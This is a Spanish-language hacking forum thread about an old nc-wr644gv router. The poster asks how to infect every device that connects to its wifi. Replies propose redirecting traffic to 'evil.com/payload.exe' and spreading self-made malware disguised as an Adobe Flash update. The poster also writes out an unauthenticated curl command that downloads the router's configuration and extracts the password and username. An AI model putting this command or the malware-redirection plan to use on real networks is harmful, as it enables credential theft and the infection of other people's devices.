[AYUDA] Exploits via Router

B4ckSw4p

Miembro muy activo
Noder Élite
Noder
10 Jul 2019
108
40
Pues lo que habéis leído, me he encontrado con un viejo router en casa y he decidido poner mis dotes de ciberseguridad para saber si era capaz de sacar el usuario y pass que tenia puesto en su dia (y si he podido).

Ahora bien, quisiera saber si es posible poder cargar de alguna forma un exploit en el router para poder """"""""""""""""""""infectar"""""""""""""""" a todos los equipos que se conecten a su señal wifi. Me podéis echar una mano con eso?

Cabe destacar que todo lo que he hecho es para uso educativo y desarrollo personal, todos los equipos son de mi pertenencia y no estoy incumpliendo ninguna ley.
 
  • Like
Reacciones : destapeman y KTaneR

HxckzLxb2

Activo muy usuario
Noderador
Nodero
Noder
22 Feb 2019
949
628
Pues lo que habéis leído, me he encontrado con un viejo router en casa y he decidido poner mis dotes de ciberseguridad para saber si era capaz de sacar el usuario y pass que tenia puesto en su dia (y si he podido).

Ahora bien, quisiera saber si es posible poder cargar de alguna forma un exploit en el router para poder """"""""""""""""""""infectar"""""""""""""""" a todos los equipos que se conecten a su señal wifi. Me podéis echar una mano con eso?

Cabe destacar que todo lo que he hecho es para uso educativo y desarrollo personal, todos los equipos son de mi pertenencia y no estoy incumpliendo ninguna ley.
Habría que modificar el firmware del router. Quizá camuflando algo como una actualización del firmware se pueda hacer algo. Saludos!
 
  • Like
Reacciones : KTaneR

Usuario

Miembro
24 Dic 2018
11
9
Pues lo que habéis leído, me he encontrado con un viejo router en casa y he decidido poner mis dotes de ciberseguridad para saber si era capaz de sacar el usuario y pass que tenia puesto en su dia (y si he podido).

Ahora bien, quisiera saber si es posible poder cargar de alguna forma un exploit en el router para poder """"""""""""""""""""infectar"""""""""""""""" a todos los equipos que se conecten a su señal wifi. Me podéis echar una mano con eso?

Cabe destacar que todo lo que he hecho es para uso educativo y desarrollo personal, todos los equipos son de mi pertenencia y no estoy incumpliendo ninguna ley.

No se puede hacer algo que nada mas conectarse a tu red ya se infecten, lo que habria que hacer seria configurar una redireccion en X pagina para que redireccione a evil.com/payload.exe, lo descargan y si lo ejecutas pues ahi lo tienes.
 
  • Like
Reacciones : destapeman

destapeman

FUCK PUSSYS, YES BADASS
Miembro del equipo
Paladín de Nodo
Jinete de Nodo
Burgués de Nodo
Moderador
Noderador
Nodero
Noder
11 Ene 2019
3.068
4.291
No es por quitarte mérito, te lo digo como consejo, los routers que instalan los ISP en tu casa tienen todos el USER y PASS por defecto, con una búsqueda en Google puedes encontrarlos.

Sería interesante que explicases el método que has seguido para lograr conseguir el USER/PASS del router.
¿Qué marca es y qué SO tiene instalado?

Como dice @Usuario lo más parecido que puedes hacer es redireccionar el tráfico a una web y que descargue el malware.

IDEAS:
-------

Te montas tú el servidor WEB y alojas el malware.
Sería interesante que desarrolles el malware también.
Lo escondes bajo una actualización de Adobe Flash Player por ejemplo. Básicamente que la descarga aparezca como una actualización del Adobe, hay herramientas para clonar webs.
¿Cómo consigues redireccionar el tráfico? enrutando todas las peticiones HTTP/HTTPS a tu servidor WEB, ¿si se quiere conectar a Youtube? "que pase por tu servidor WEB".

Esa es la forma laboriosa

La forma mas vaga sería descargarte el malware o pasar de montar el servidor y redireccionar directamente a la página donde está alojado el malware, lo único que habría que pensar como hacer pasar la página por algo legítimo xDD

Si alguien tiene mas ideas dpm ;) ;) ;)

Por cierto, he movido el post a la categoría correcta
 

B4ckSw4p

Miembro muy activo
Noder Élite
Noder
10 Jul 2019
108
40
Antes que nada, muchas gracias a todos por aportar vuestras ideas, ahora voy a explicar de que router se trata y como he obtenido el usuario y contraseña.
 
Última edición:

B4ckSw4p

Miembro muy activo
Noder Élite
Noder
10 Jul 2019
108
40
El router es un nc-wr644gv, este tipo de router tiene una vulnerabilidad y es que puedes descargarte su fichero de configuración sin necesidad de haber iniciado sesión. (Una joyita eh)

Entonces, en mi terminal de kalilinux use el siguiente comando: "curl -s "http://(ip vulnerable)/cgi-bin/config_download.cgi?action=download"|strings|grep -i password"

En esa url estamos indicando que queremos descargar el fiche de configuracion y a su vez, que nos busque la linea donde haya algo con el parametro "password".
Ahora claro, tenemos la contraseña, pero no el usuario, para eso tenemos que usar el mismo url pero cambiando el password por username.
Y obtendremos los siguientes datos:

sdasdasdas.PNG


No me hago responsable del uso que le podéis dar a esta información, todo lo escrito aquí ha sido con fines educativos.


@destapeman Espero que te haya gustado el post 😄
 

destapeman

FUCK PUSSYS, YES BADASS
Miembro del equipo
Paladín de Nodo
Jinete de Nodo
Burgués de Nodo
Moderador
Noderador
Nodero
Noder
11 Ene 2019
3.068
4.291
El router es un nc-wr644gv, este tipo de router tiene una vulnerabilidad y es que puedes descargarte su fichero de configuración sin necesidad de haber iniciado sesión. (Una joyita eh)

Entonces, en mi terminal de kalilinux use el siguiente comando: "curl -s "http://(ip vulnerable)/cgi-bin/config_download.cgi?action=download"|strings|grep -i password"

En esa url estamos indicando que queremos descargar el fiche de configuracion y a su vez, que nos busque la linea donde haya algo con el parametro "password".
Ahora claro, tenemos la contraseña, pero no el usuario, para eso tenemos que usar el mismo url pero cambiando el password por username.
Y obtendremos los siguientes datos:

Ver el archivo adjunto 2941

No me hago responsable del uso que le podéis dar a esta información, todo lo escrito aquí ha sido con fines educativos.


@destapeman Espero que te haya gustado el post 😄
😘 :p:p
 
  • Like
Reacciones : B4ckSw4p
Arriba Pie